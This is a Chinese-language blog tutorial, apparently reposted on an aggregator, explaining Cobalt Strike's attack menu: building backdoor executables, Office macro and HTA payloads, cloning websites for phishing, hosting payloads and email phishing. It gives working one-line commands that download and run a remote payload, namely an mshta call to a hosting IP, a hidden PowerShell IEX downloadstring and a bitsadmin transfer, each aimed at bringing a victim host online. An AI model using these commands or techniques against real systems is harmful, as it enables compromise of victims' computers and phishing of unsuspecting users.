欢迎访问 生活随笔!

生活随笔

当前位置: 首页 > 编程资源 > 编程问答 >内容正文

编程问答

CS之攻击菜单详解-后门生成与上线

发布时间:2024/8/1 编程问答 29 豆豆
生活随笔 收集整理的这篇文章主要介绍了 CS之攻击菜单详解-后门生成与上线 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

目录

一、生成后门

windows可执行程序exe

payload生成器

Office宏

HTA文档

二、Web钓鱼

网站克隆

文件托管

web投递

签名Applet攻击和智能Applet攻击

信息收集

站点管理

三、邮件钓鱼


在创建完监听器后 ——> CS监听器配置,接下来进行后门的生成

一、生成后门

能够生成如HTA文档、office宏、payload生成器、exe程序。

windows可执行程序exe

可以看到能生成两种windows可执行程序,其分别代表stage分阶段和unstage(stageless)不分阶段。传送门 ——> Cobalt Strike中payload的stage与unstage区别

选择监听器后,按需生成不同类型的exe

然后在目标机器运行即可上线

payload生成器

该模块可以生成多种语言的后门Payload,包括C, C#, Python, Java, Perl, Powershell脚本,Powershell命令,Ruby, Raw,免杀框架Veli中的shellcode等。

传送门 ——> CS payload生成器(Generator)介绍与上线方式

Office宏

宏病毒是一种常见的计算机病毒,寄存在文档或模板中,并不会直接感染可执行程序。但是打开携带宏病毒的文档,其中的命令就会被执行,导致文档所在电脑主机被感染。

传送门——> CobaltStrike 生成office宏病毒进行钓鱼攻击

HTA文档

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,其里面可包含html、js、vb等语言。其和VB、C++等程序语言所设计的软件界面没什么差别。双击hta文件就能运行

CobaltStrike可生成三种类型的hta文件,分别是Executable、Powershell、VBA

 这三类样本的区别在于:

  • Executable 将会在hta文件中内嵌一个PE文件
  • Powershell 将会在hta文件中内嵌一段Powershell代码
  • VBA 将会在hta文件中内嵌一段VBA代码

1. 生成powershell类型的hta文档

类容如下

双击程序运行,主机上线

 另外两种不推荐使用,因为会报错如下界面:

二、Web钓鱼

web钓鱼模块中有如下选项

网站克隆

克隆就是克隆一个与目标网站看起来一模一样的站点,然后可以在里面插入攻击代码,进行钓鱼攻击

传送门——> cs克隆目标站点

文件托管

如上,我们生成了一个hta类型的后门文件,此时需要放在目标机器上双击才能运行,这样是不是有点麻烦了?我们就想能不能把它放在自己的网站上,然后执行命令就能自动下载启动了?文件托管就是托管一个文件,提供一个文件下载

1. 对生产的evil.hta文件进行托管

如下,填写好后点击运行

生成链接,只要访问该链接就能将文件下载

运行:mshta http://39.100.88.162:80/download/file.ext,就会对该文件进行下载和运行。主机即可上线

ps: mshta是Windows内置的一个程序,主要用于执行HTA程序 ,mshta可以直接执行远端的hta程序

 

web投递

上面的文件托管需要我们自己选择一个文件进行托管。而web投递则是生成并托管一个payload,通过访问这个url就能下载该payload甚至直接执行。

如下填写好,可见生成的payload类型有多种

1. payload为powershell

点击运行,为一段ps脚本,意思为远程下载脚本并运行。复制此 直接在主机上运行就能自动下载payload并上线上线

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:80/a'))"

2. payload为powershell IEX

iex是 Invoke-Expression命令 的简写,用于执行字符串中的命令 如:iex "ls"

生成powershell iex的payload类型,可见比上面ps类型少了前面执行的部分

IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:8000/a'))

3. payload为exe

可以直接访问下载exe

4. payload为bitsadmin

Background Intelligent Transfer Service Admin(BITSAdmin) 是一个命令行工具,可以创建下载或上传文件并监控其进度。BITSAdmin是与windows xp一起发布的。

transfer参数是从远程服务器下载到本机的简单便捷的方法。需要定义传输任务的名称,可以是任何名字。在示例中,将所有的传输任务定义为hackingarticles。在定义名称后需要输入远程服务器文件名的位置。在远程服务器上有一个名为ignite.png的示例图像文件。需要本地的路径和名称。如下例子:
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png

所以可以利用bitsadmin工具进行payload下载与运行

在cmd中运行复制的url

 

如下,上线 

签名Applet攻击和智能Applet攻击

  • 签名Applet攻击:Java Signed Applet Attack,这个攻击会启动一个 web 服务器来托管一个自签名的 Java applet(用Java语言编写的小应用程序,可以直接嵌入到网页中,并能够产生特殊的效果。)。访客被要求给这个 applet 权限来运行。当一个访客准许了这个权限,你就获取了到他们系统的权限。
  • 智能Applet攻击:Java Smart Applet Attack,这个applet分析它的环境并决定使用哪个Java漏洞利用。如果Java版本是有漏洞的,此applet会禁用安全沙箱,并使用Cobalt Strike的Java注入器执行payload。

这两攻击就不太想尝试了,因为很少很少有主机会存在applet的运行环境。(我也不知道怎么利用~~)

信息收集

生活一个网站39.100.xx.xx,只要一访问就跳转到百度的页面

然后能在 web日志中看到访问者的一些信息,如ip,访问使用的浏览器名称和版本

站点管理

以上生成的站点,我们可以在web站点管理中查看

如 

三、邮件钓鱼

这个模块还是不建议使用,因为有更好的钓鱼工具,如swaks ——> swaks邮件伪造

总结

以上是生活随笔为你收集整理的CS之攻击菜单详解-后门生成与上线的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。